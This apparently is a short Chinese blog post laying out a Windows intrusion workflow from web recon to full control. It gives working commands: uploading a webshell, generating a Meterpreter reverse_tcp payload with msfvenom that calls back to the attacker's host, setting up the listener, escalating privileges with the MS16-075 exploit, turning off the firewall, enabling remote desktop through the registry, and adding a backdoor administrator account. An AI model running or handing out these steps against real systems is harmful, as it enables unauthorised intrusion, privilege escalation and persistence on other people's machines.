基本流程

一、查看robots.txt文件看看是否有敏感信息

二、扫目录,一个备份文件和后台

三、从备份文件中找到后台帐号密码,登陆

四、找到上传点,上传一句话木马

五、蚁剑连接,查看当前权限

六、收集信息

七、根据补丁号,找提权exp

八、MSF生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.96 lport=4444 -f exe -o /home/kali/Desktop/b.exe

九、执行监听

use exploit/multi/handler
               
set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.10.96

show options

十、上传并执行木马

十一、获取一个低权限的shell

十二、自动化提权getsystem

十三、提权失败,利用补丁找到对应的exp,如:MS16-075

background     //把你当前的metasploit shell转为后台执行

use exploit/windows/local/ms16_075_reflection_juicy

set session 1

run

十四、shell,进入进入cmd终端,出现乱码使用,chcp 65001

十五、关闭防火墙

NetSh Advfirewall set allprofiles state on      //开启防火墙

NetSh Advfirewall set allprofiles state off      //关闭防火墙

十六、开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f            //开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f           //关闭3389

十七、添加用户到管理员组

ne user                                       //查看用户

net user secxun qwe123. /add                  //添加用户

net localgroup administrators secxun /add     //将用户添加到管理员组中

十八、远程连接

posted @ 2020-11-03 12:11  lnterpreter  阅读(136)  评论(0编辑  收藏  举报